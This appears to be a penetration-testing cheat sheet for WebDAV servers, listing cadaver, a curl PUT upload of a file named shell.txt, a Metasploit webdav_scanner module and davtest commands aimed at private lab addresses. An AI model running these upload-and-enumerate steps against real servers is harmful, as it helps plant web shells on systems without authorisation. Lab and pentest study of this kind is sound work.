#cadaver
cadaver 10.10.10.10
#curl PUT request
curl -T 'shell.txt' 'http://10.10.10.10'#Metasploit
use auxiliary/scanner/http/webdav_scanner
set path /dav/
set rhosts 10.11.1.14
run
POC that target is running webDav
extra: Testing file permissions → davtest
#davtest
davtest -url http://10.11.1.14/dav